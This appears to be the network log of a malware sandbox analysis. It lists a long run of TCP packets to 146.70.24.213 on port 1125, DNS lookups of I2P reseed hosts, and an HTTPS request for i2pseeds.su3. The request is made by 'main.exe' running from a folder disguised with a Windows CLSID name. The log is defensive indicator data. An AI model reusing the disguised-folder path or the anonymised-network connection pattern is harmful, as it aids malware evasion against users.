Oct 11, 2024 16:53:49.242651939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242697954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242727041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242742062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242990017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243081093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243113995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243204117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243225098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243241072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243274927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243308067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243319988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243339062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243372917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243396997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243396997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243438959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243470907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243501902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243521929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243537903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243561983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243593931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243627071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243660927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243693113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243704081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243704081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243726015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243757963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243788958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243823051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.243833065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.243833065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.289333105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.329580069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329634905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329668999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329700947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329703093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.329734087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329755068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.329785109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329834938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329842091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.329935074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329967976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.329988003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330017090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330049038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330069065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330080986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330128908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330161095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330209017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330210924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330210924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330245972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330279112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330311060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330326080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330343008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330360889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330375910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330408096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330439091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330463886 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330470085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330502033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330533028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330562115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330562115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330565929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330599070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330615044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330635071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330688953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.330734015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.330986977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331037998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331041098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331089020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331121922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331146002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331171036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331203938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331252098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331295013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331295013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331304073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331355095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331402063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331423044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331453085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331502914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331564903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331595898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331629038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331656933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331681967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331696033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331712008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331762075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331793070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331825018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331849098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331882954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331914902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331929922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331947088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.331973076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.331980944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332063913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332113981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332123995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332161903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332165956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332195997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332228899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332245111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332278013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332307100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332354069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332377911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332386017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332434893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332468033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332478046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332478046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332501888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332535028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332568884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332601070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332609892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332609892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332633018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332664967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332696915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332727909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332737923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332737923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332761049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332796097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332823992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332858086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332864046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332864046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332891941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332922935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332954884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332986116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.332995892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.332995892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333019018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333050966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333084106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333138943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333138943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333162069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333195925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333228111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333261013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333292007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333302975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333302975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333326101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333357096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333405972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333410025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333437920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333483934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333492041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333523035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333550930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333554983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333589077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333621979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333648920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333659887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333659887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333697081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333729029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333760023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333782911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333792925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333825111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333851099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333858967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333864927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333890915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333925962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333954096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333983898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.333993912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.333993912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334017038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334050894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334081888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334110975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334114075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334140062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334151983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334235907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334244013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334287882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334316015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334342003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334364891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334398985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334429979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334460974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334470987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334470987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.334495068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.334561110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.420962095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421077013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421127081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421158075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421190023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421211958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421211958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421240091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421303988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421335936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421369076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421384096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421384096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421401024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421436071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421447992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421468019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421499968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421534061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421566010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421578884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421578884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421597958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421629906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421660900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421693087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421710014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421710014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421725035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421756983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421786070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.421788931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421822071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421853065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421884060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421915054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421946049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.421977043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422005892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422050953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422189951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422224045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422272921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422282934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422322989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422355890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422404051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422435999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422454119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422454119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422463894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422512054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422549009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422590017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422590017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422597885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422631025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422677994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422688007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422760010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422791958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422825098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422857046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422858000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422878027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.422893047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422929049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422976971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.422982931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423008919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423041105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423069954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423070908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423120022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423146009 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423151016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423165083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423228025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423278093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423280954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423311949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423345089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423379898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423379898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423427105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423459053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423506021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423506021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.423507929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423541069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.423573971 CEST	1125	49730	146.70.24.213	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2024 16:54:03.003743887 CEST	192.168.2.4	1.1.1.1	0xf383	Standard query (0)	banana.incognet.io	A (IP address)	IN (0x0001)	false
Oct 11, 2024 16:54:53.298024893 CEST	192.168.2.4	1.1.1.1	0xd5be	Standard query (0)	reseed.diva.exchange	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2024 16:54:03.016427040 CEST	1.1.1.1	192.168.2.4	0xf383	No error (0)	banana.incognet.io		23.137.250.108	A (IP address)	IN (0x0001)	false
Oct 11, 2024 16:54:53.455132008 CEST	1.1.1.1	192.168.2.4	0xd5be	No error (0)	reseed.diva.exchange		80.74.145.70	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49755	23.137.250.108	443	2656	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 14:54:03 UTC	104	OUT	GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-11 14:54:03 UTC	330	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 14:54:03 GMT Content-Type: application/octet-stream Content-Length: 88785 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 Server: banana.incognet.io Cache-Control: public, max-age=604800, immutable Access-Control-Allow-Origin: * Vary: Origin Allow: GET
